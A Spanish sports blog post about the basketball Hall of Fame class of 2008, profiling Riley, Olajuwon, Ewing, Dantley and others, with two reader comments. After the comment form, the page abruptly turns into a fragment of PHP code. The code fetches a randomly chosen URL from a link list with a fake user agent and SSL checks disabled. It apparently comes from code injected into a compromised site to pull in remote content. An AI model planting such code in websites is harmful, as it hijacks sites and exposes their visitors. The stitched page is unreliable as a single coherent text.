Hall of Fame: Clase de 2008

07 de April de 2008 por Gallis

Pocas horas antes de que se dispute la final de la NCAA, que enfrentará a las universidades de Memphis y Kansas, el Salón de la Fama ha anunciado en San Antonio los nombres de su promoción de 2008. Una lista, a tenor de los nombres que la componen, de relumbrón: El entrenador Pat Riley, los jugadores Hakeem Olajuwon, Patrick Ewing y Adrian Dantley, el propietario de los Pistons, Bill Davidson, el análista universitario Dick Vitale y Cathy Rush, entrenadora de la universidad femenina de Inmaculata, son, por derecho propio, nuevos miembros del Salón de la Fama. Todos ellos han recibido al menos 18 de los 24 votos de los miembros del comité de honor del Naismith Memorial Hall of Fame. La ceremonia oficial de su ingreso tendrá lugar el próximo mes de septiembre.

La 2007/08 será sin duda una temporada para olvidar para Pat Riley. Sus Miami Heat son el peor equipo de la temporada, con un pésimo balance de 13 victorias y 64 derrotas. Sin embargo, este pequeño borrón no empaña el brillante currículo de Riley, que le hace absolutamente merecedor de su ingreso en el Hall of Fame. Sin duda Riley, cuya imagen va irremediablemente asociada al pelo engominado, será recordado como el entrenador de los Lakers del Showtime. Con los angelinos consiguió 4 anillos como entrenador, uno como asistente y otro más como jugador, en la temporada 1971/72. Riley dejó Los Angeles para entrenar a los Knicks, equipo en el que jugaba otro de los nuevos miembros del Hall of Fame, Patrick Ewing, y con el que disputó una final. Desde hace 12 años su destino está ligado a los Miami Heat. El culmen de su trabajo fue hace 2 temporadas, cuando dirigiendo a los Shaq, Wade y compañía consiguió un nuevo anillo. Tan solo Lenny Wilkens y Don Nelson (de quién hablaremos más tarde) han ganado más partidos NBA que él.

El nigeriano Hakeem Olajuwon es conocido, con permiso de Larry Bird, como el mejor jugador de la década de los 80 y de la década de los 90 cuyas iniciales no son MJ. The Dream o el bailarín de claqué son apodos que reflejan exactamente su principal contribución a este deporte: hacer disfrutar a los aficionados. Pero además su palmarés es envidiable. Lideró a los Houston Rockets a la consecución de 2 anillos consecutivos en las temporadas 1994 y 1995. Y disputó una final más, en 1986, cuando formaba junto a Ralph Sampson las Twin Towers. Además, el primero de esos años fue nombrado MVP de la liga y MVP de las finales de la NBA. Es el jugador que más tapones ha puesto en la historia de la liga (3.830) y es el único jugador que ha conseguido acumular más de 3.000 tapones y 2.000 robos al acabar su carrera. De ahí que fuera nombrado en 2 ocasiones (una de ellas también en 1994) mejor jugador defensivo de la liga.

Podría parecer casual que Ewing y Olajuwon sean incluídos en el Hall of Fame la misma temporada, pero la verdad es que sus carreras no han parado de cruzarse. Ambos coincidieron en tres Final Four universitarias, aunque sólo se enfrentaron en una de ellas. Fue en 1984 y Georgetown, liderada por Ewing, derrotó a Olajuwon y sus muchachos. 10 años después el nigeriano tuvo su revancha en la final de la NBA que les enfrentó. Ése es precisamente el debe de la carrera del legendario pívot de los Knicks: retirarse sin haber conseguido un anillo de campeón. El tendón de Aquiles le impidió luchar por la revancha en la final que enfrentó a New York con San Antonio en 1999. Sin embargo, Ewing es uno de los pocos elegidos que puede presumir de haber formado parte del Dream Team de Barcelona 92. En esos juegos Ewing consiguió su segunda medalla olímpica, tras la obtenida frente a España en Los Angeles 84. Además, Ewing jugó 11 All-Star y acabó sus 17 temporadas con casi 25.000 puntos y más de 11.600 rebotes.

Pero si con alguien hace por fin justicia este año el Salón de la Fama es con Adrian Dantley, y es que tras cuatro nominaciones consecutivas, por fin le ha llegado su turno. Dantley ha sido uno de los más grandes anotadores puros que ha dado el baloncesto, y hasta 7 equipos NBA disfrutaron de su talento. Su capacidad para la finta y un letal tiro de 3-4 metros le permitió promediar más de 30 puntos por partido durante 4 años consecutivos. Siempre tuvo el estigma de perdedor -sólo ganó una medalla de oro olímpica, en 1976-, pero no por ello merecía el olvido del Hall of Fame. Sus más de 23.000 puntos con, atención, un 54% de acierto en el tiro, son aval más que suficiente.

Estas 4 leyendas del basket no son los únicos nuevos miembros del Hall of Fame. Bill Davidson es propietario de los Detroit Pistons desde 1974, con los que ha ganado 3 anillos y de las Detroit Shocks desde 1998, que han conseguido otros 2. El entrenador Dick Vitale ha sido comentarista universitario de ESPN desde hace más de 30 años y está considerado uno de los padres del concepto de la March Madness. Cathy Rush, entrenadora de la universidad femenina de Inmaculata, es la última de los nuevos miembros del Hall of Fame. Rush lo ha conseguido después de estar nominada 5 veces.

Nadie dijo que ingresar en el Hall of Fame fuera fácil y es que los nombres que se han quedado a las puertas no desmerecen en nada a los afortunados. Por cuarta vez Dennis Johnson, de quién Larry Bird dijo que era el mejor compañero que había tenido nunca, se ha quedado a las puertas de la fama. Su reciente fallecimiento le hacía entrar en todas las quinielas, pero seguro que tiene nuevas oportunidades para entrar en el lugar que tanto merece. Junto a él, tendrán que esperar una nueva oportunidad, entre otros, dos de los hombres más queridos por los aficionados de los Golden State Warriors, Don Nelson y Chris Mullin. Eso sí, la lucha para ser miembro de la promoción de 2009 se antoja épica, ya que ese año serán elegibles por primera vez un tal Michael Jordan, John Stockton (esta vez sin su inseparable Karl Malone), David Robinson, el brasileño Óscar Schmidt Becerra, y dos de los entrenadores en activo con más éxito, Gregg Popovich y Jerry Sloan. Casi nada.

Comenta

2 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Tremenda la clase del 2008.

    Ewing no era de mis favoritos y aun así era la leche. Pero Hakeem, bufff, fue un jugador único. Se suele decir que no habrá otro Magic u otro Bird, pero tampoco habrá jamás otro Olajuwon.

    Riley es sin duda uno de los grandes de los banquillos, y lo ha demostrado tantas veces y de formas tan diferentes que casi me resulta el más admirable de todos.

    De Adrian Dantley yo tengo una imagen: una suspensión imparable tras dribbling, probablemente después de amagar el tiro. Con un poco de suerte se habría retirado con una mano repleta de anillos. Pero la suerte y la calidad suelen tomar caminos diferentes.

      Citar

  2. Dantley dice:
    #2

    Wuas, preciosa la foto que has elegido para Dantley. Típico Dantley, encontrando huecos con su 1’95. Esos movimientos de mecedora hasta que el defensor ya no sabía por donde andaba, buff, baloncesto del bueno. Como dice Magic, Dantley podría haberse llevado muchos anillos. Si lo hubieran dejado en Lakers, con Magic podrían haber creado muchísimo, aunque Dantley era más de juego en estático. Con Stockton y Malone habría completado lo suficiente para darle a Utah el título. Y ya la más cercana, aquella en la que el trade final llevó a Aguirre a Detroit.

    Las de Riley, Olajuwon y Ewing se caen por su propio peso, supongo que habrá habido unanimidad.

    Y la del 2009, madre mía, Jordan, ¿hace falta que voten? Y mi queridísimo Oscar, Mano Santa, habría sido un grande en la NBA, pero prefirió simplemente ser un grande del Baloncesto.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>